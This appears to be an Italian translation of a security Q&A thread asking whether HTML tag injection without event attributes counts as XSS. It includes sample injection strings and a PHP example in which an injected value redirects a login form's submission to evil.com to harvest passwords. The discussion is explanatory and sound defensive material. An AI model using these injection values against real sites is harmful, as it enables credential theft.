Possiamo considerare l'iniezione di tag HTML senza attributi evento come XSS?

0

Mi chiedo se possiamo considerare l'iniezione di tag HTML come a , image , img , video , audio , marquee o iframe senza un attributo evento come XSS ? Poiché non è coinvolto alcun JavaScript e quindi non è incluso ed eseguito alcun codice JavaScript. Ma una risorsa (esterna) viene caricata o nel caso del tag marquee viene attivata un'animazione (spesso rovinando il modello). Così come per a -tag il rischio di poter includere URL cliccabili.

Quindi è un'iniezione HTML puro (anche se si rompe qualcosa come un campo di input) considerata come XSS valido e quale sarebbe la motivazione per spiegare che è XSS valido?

Alcuni esempi:

  1. "><marquee>123
  2. "><img src=http://example.com/a.jpg
  3. <a href=//example.com>123</a>
posta Bob Ortiz 17.06.2016 - 15:58
fonte

2 risposte

2

No, non chiamerei lo scripting cross-site, dal momento che non sono coinvolti scripting effettivi. Ma ciò non significa che non sia un rischio per la sicurezza! Il termine corretto per la vulnerabilità sarebbe "Iniezione HTML" e, come si nota nella domanda, può essere una cosa pericolosa.

Ecco un altro esempio, giusto per mostrare come l'iniezione HTML può essere effettivamente utilizzata per causare danni reali. Supponiamo che tu abbia questo codice PHP:

echo "<form method='post' class='" + $untrusted + "' action='login.php'>";

E diciamo che $untrusted è impostato su ' action='http://evil.com . Non c'è bisogno di XSS quando puoi raccogliere password usando puro HTML vecchio.

    
risposta data 17.06.2016 - 16:02
fonte
2

Penso che lo scenario di cui parli si chiami HTML injection. A volte, potrebbe esserci un filtro XSS distribuito che non consente alcun attributo di evento (l'elenco è enorme) e tag di script. In tal caso, "ottenere XSS è difficile". Anche se, le liste nere raramente funzionano per prevenire l'XSS.

    
risposta data 17.06.2016 - 16:06
fonte

Leggi altre domande sui tag